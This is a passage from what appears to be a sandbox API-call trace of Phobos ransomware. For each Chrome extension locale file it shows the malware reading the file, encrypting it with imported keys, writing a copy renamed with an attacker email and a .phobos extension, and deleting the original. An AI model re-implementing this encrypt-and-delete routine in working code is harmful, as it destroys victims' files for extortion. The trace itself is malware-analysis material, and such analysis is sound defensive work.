data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0157.447] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=710) returned 1 [0157.447] CloseHandle (hObject=0x138) returned 1 [0157.447] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json")) returned 0x2020 [0157.447] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0157.447] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0157.447] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0157.447] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0157.447] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0157.448] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0157.448] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0157.448] ReadFile (in: hFile=0x138, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x2c6, lpOverlapped=0x0) returned 1 [0157.490] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2d0, dwBufLen=0x2d0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2d0) returned 1 [0157.490] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x2d0, lpOverlapped=0x0) returned 1 [0157.491] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d68) returned 1 [0157.491] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0157.491] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0157.491] CryptDestroyKey (hKey=0xa32d68) returned 1 [0157.491] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0157.491] CryptDestroyKey (hKey=0xa327e8) returned 1 [0157.491] CloseHandle (hObject=0x138) returned 1 [0157.491] CloseHandle (hObject=0x194) returned 1 [0157.491] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json")) returned 1 [0157.492] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0157.492] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0157.493] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=622) returned 1 [0157.493] CloseHandle (hObject=0x194) returned 1 [0157.493] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json")) returned 0x2020 [0157.493] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0157.493] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0157.493] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0157.493] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0157.493] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0157.494] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0157.494] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0157.494] ReadFile (in: hFile=0x194, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x26e, lpOverlapped=0x0) returned 1 [0157.614] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x270, dwBufLen=0x270 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x270) returned 1 [0157.614] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x270, lpOverlapped=0x0) returned 1 [0157.616] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32968) returned 1 [0157.616] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0157.616] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0157.616] CryptDestroyKey (hKey=0xa32968) returned 1 [0157.616] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0157.616] CryptDestroyKey (hKey=0xa327e8) returned 1 [0157.616] CloseHandle (hObject=0x194) returned 1 [0157.617] CloseHandle (hObject=0x138) returned 1 [0157.617] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\messages.json")) returned 1 [0157.618] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0157.618] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0157.618] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=669) returned 1 [0157.618] CloseHandle (hObject=0x138) returned 1 [0157.618] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json")) returned 0x2020 [0157.618] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0157.618] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0157.619] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0157.619] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0157.619] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0157.619] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0157.619] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0157.619] ReadFile (in: hFile=0x138, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x29d, lpOverlapped=0x0) returned 1 [0158.134] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2a0, dwBufLen=0x2a0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2a0) returned 1 [0158.134] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x2a0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x2a0, lpOverlapped=0x0) returned 1 [0158.135] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32c28) returned 1 [0158.135] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0158.135] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0158.135] CryptDestroyKey (hKey=0xa32c28) returned 1 [0158.135] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0158.135] CryptDestroyKey (hKey=0xa327e8) returned 1 [0158.136] CloseHandle (hObject=0x138) returned 1 [0158.136] CloseHandle (hObject=0x194) returned 1 [0158.136] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json")) returned 1 [0158.137] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0158.137] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0158.139] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=699) returned 1 [0158.139] CloseHandle (hObject=0x194) returned 1 [0158.139] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json")) returned 0x2020 [0158.139] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0158.139] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0158.139] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0158.139] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0158.139] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0158.140] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0158.140] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0158.140] ReadFile (in: hFile=0x194, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x2bb, lpOverlapped=0x0) returned 1 [0158.189] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2c0, dwBufLen=0x2c0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2c0) returned 1 [0158.189] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x2c0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x2c0, lpOverlapped=0x0) returned 1 [0158.190] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32de8) returned 1 [0158.190] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0158.190] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0158.190] CryptDestroyKey (hKey=0xa32de8) returned 1 [0158.190] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0158.190] CryptDestroyKey (hKey=0xa327e8) returned 1 [0158.190] CloseHandle (hObject=0x194) returned 1 [0158.190] CloseHandle (hObject=0x138) returned 1 [0158.190] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json")) returned 1 [0158.191] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0158.191] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0158.192] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=642) returned 1 [0158.192] CloseHandle (hObject=0x138) returned 1 [0158.192] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json")) returned 0x2020 [0158.192] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0158.192] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, 